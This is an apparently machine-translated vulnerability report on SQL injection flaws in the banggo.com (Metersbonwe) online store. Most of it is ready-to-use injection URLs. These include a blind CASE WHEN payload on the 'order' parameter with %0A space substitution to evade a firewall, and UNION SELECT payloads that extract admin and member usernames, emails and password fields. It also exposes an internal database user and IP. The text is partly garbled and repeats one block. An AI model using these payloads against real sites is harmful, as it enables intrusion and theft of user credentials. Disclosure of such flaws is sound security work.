Metersbonwe official mall blind injection and a union Injection

A blind note from the official store of metersbonwe liked the vendor. The vulnerability was quickly responded, fixed quickly, and added anti-injection .. It took a long time to find this small problem .. Fix it again...

Http://me-city.banggo.com/Goods/comments? Good_id = 556375 & user_id = luj8848 & order = % 28 case % 0 Awhen % 281 = 1% 29% 0 Athen % 0Aadd_time % 0 Aelse % 0Ais_help % 0 Aend % 29% 23
 
Http://me-city.banggo.com/Goods/comments? Good_id = 556375 & user_id = luj8848 & order = % 28 case % 0 Awhen % 281 = 1% 29% 0 Athen % 0Aadd_time % 0 Aelse % 0Ais_help % 0 Aend % 29% 23
 
Order gets a blind note in when 1 = 1 1 = 2 where the return condition shows the order of comments.
 
 
 
Http://act.banggo.com/Ajax/adCodeInfo? Time = 0.7242165785281457 & callback = jsonp1335235877318 & adposid = 175
 
Injection also exists here, but it seems that it cannot be used. The test will be followed by various SQL statements. Note that the space is replaced by % 0a... (It is estimated that the firewall is added)




Http://me-city.banggo.com/Goods/comments? Good_id = 556375 & user_id = luj8848 & order = % 28 case % 0 Awhen % 281 = 1% 29% 0 Athen % 0Aadd_time % 0 Aelse % 0Ais_help % 0 Aend % 29% 23
 
Http://me-city.banggo.com/Goods/comments? Good_id = 556375 & user_id = luj8848 & order = % 28 case % 0 Awhen % 281 = 1% 29% 0 Athen % 0Aadd_time % 0 Aelse % 0Ais_help % 0 Aend % 29% 23
 
Order gets a blind note in when 1 = 1 1 = 2 where the return condition shows the order of comments. Www.2cto.com
 
 
 
Http://act.banggo.com/Ajax/adCodeInfo? Time = 0.7242165785281457 & callback = jsonp1335235877318 & adposid = 175
 
Injection also exists here, but it seems that it cannot be used. The test will be followed by various SQL statements. Note that the space is replaced by % 0a... (It is estimated that the firewall is added)
Solution:

It will be perfect if you try again ..


Second: a union injection in metersbonwe official mall
Detailed Description: injection point:
Http://www.banggo.com/Ad/getAdPosListJs.shtml? Position = 175
 
Http://www.banggo.com/Ad/getAdPosListJs.shtml? Position = 175% 29% 20and % 201 = 2% 20 union % 20 select % 28%, user % 29% 23
 
Open_user@10.80.30.240"
 
Query administrator:
 
Http://www.banggo.com/Ad/getAdPosListJs.shtml? Position = 175% 29% 20and % 201 = 2% 20 union % 20 select % ,,2, concat % 28user_id, 0x7c, user_name, 0x7c, % 20 email, 0x7c, password % 29% 20 from % 20system_admin_user % 23
 
Check the member (only the account that you randomly registered is checked and confirmed to be in the same database as the member ):
Http://www.banggo.com/Ad/getAdPosListJs.shtml? Position = 175% 29% 20and % 201 = 2% 20 union % 20 select % ,,2, concat % 28user_id, 0x7c, email, 0x7c, % 20user_name, 0x7c, password % 29% 20 from % 20user_users % 20 where % 20user_name % 20 like % 200 x 616161616161616263% 20 limit % 201% 23
 
 
I think the store should separate member data from the website to ensure the security of member data.
 


 
Solution:

Understand! Digital Injection, pay attention...



Author kobin97